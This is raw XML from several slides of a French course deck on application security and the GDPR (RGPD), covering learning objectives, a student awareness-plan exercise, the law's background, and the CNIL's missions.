                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4514FD1B-A0BF-4C73-A68E-4B1F7299F6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B0F906E0-ED13-4E90-A772-9673695E94FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10691265" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Connaître les bonnes pratiques de sécurité et les failles communément exploitées dans le domaine applicatif.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Connaître ses obligations face au Règlement Général de Protection des Données.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B100A6-1EBC-40AB-BB7E-26807F3CF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A35E840B-C372-4301-A9E8-B9ED75A216D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1991461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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exercice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462AB5B3-6E3D-4837-936D-030D40E80169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10890731" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réaliser un plan de sensibilisation aux bonnes pratiques à destination des utilisateurs se trouvant à l’EPSI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Groupe de 4 max et minimum 2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793615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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800102" y="960594"/>
            <a:ext cx="5828114" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" dirty="0"/>
              <a:t>RGPD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" cap="none" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" cap="none" dirty="0"/>
              <a:t>èglement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" cap="none" dirty="0"/>
              <a:t>énéral sur la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" cap="none" dirty="0"/>
              <a:t>rotection des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" cap="none" dirty="0"/>
              <a:t>onnées</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365109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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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E50A57D4-B86D-4B06-8DD8-6A2DBBF59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87205" y="1786168"/>
            <a:ext cx="3446409" cy="3387116"/>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4797971" y="1906418"/>
            <a:ext cx="6693941" cy="3923165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Naît d’un concours de circonstance gouvernemental. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dépend de la Loi Informatique et Libertés de 1978.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Promeut le respect des citoyens, de leurs libertés.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Groupe 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B41E94-AA52-450C-8EE8-454DD19227B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6357644" y="4311858"/>
            <a:ext cx="5034256" cy="1537312"/>
            <a:chOff x="6819388" y="4082191"/>
            <a:chExt cx="5034256" cy="1537312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle : coins arrondis 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486DFEA3-B95A-45AA-818F-71E73BA06C0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6819388" y="4082191"/>
              <a:ext cx="5034256" cy="1537312"/>
            </a:xfrm>
            <a:prstGeom prst="roundRec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484B94B7-5297-4969-9871-F8E7EC2C0DCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7021039" y="4230976"/>
              <a:ext cx="4757103" cy="1169551"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="76ABDC"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>La loi Informatique et Libertés a été révisée en 2004, les changements ont notamment donné naissance au CIL « Correspondant Informatique et Libertés ».</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="just">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="Ø"/>
              </a:pPr>
              <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76ABDC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="76ABDC"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Source : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="76ABDC"/>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La loi de 2004 et l'introduction du CIL</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76ABDC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122DED9D-A1D0-4BF2-9637-6B4A637C0205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472580" y="5281466"/>
            <a:ext cx="2675658" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="173A59"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Marie-Laure Denis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="173A59"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Présidente de la CNIL</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="173A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906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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="307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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les objectifs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C35D615-50DA-401D-B603-ADB5D3341DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2080551956"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="800100" y="2174791"/>
          <a:ext cx="10691265" cy="4546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numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205177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36302A27-19A1-4123-AEED-C46611F78B12}"/>
                                            </p:graphicEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:graphicEl>
                                              <a:dgm id="{36302A27-19A1-4123-AEED-C46611F78B1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ECC983E3-4951-465C-BAE4-F5B4BB7AC23B}"/>
                                            </p:graphicEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:graphicEl>
                                              <a:dgm id="{ECC983E3-4951-465C-BAE4-F5B4BB7AC23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78347299-E708-491B-8657-BD8E81843046}"/>
                                            </p:graphicEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:graphicEl>
                                              <a:dgm id="{78347299-E708-491B-8657-BD8E8184304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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les Acteurs institutionnels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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3074" name="Picture 2" descr="Afficher l’image source">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E50A57D4-B86D-4B06-8DD8-6A2DBBF591C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0099" y="2827181"/>
            <a:ext cx="3398089" cy="200487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4797971" y="1906418"/>
            <a:ext cx="6693941" cy="3923165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Autorité Administrative Indépendante en charge de réguler l’utilisation des données personnelles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> missions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Informer &amp; protéger les droits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accompagner &amp; Conseiller la conformité </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Anticiper &amp; Innover </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Contrôler &amp; Sanctionner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
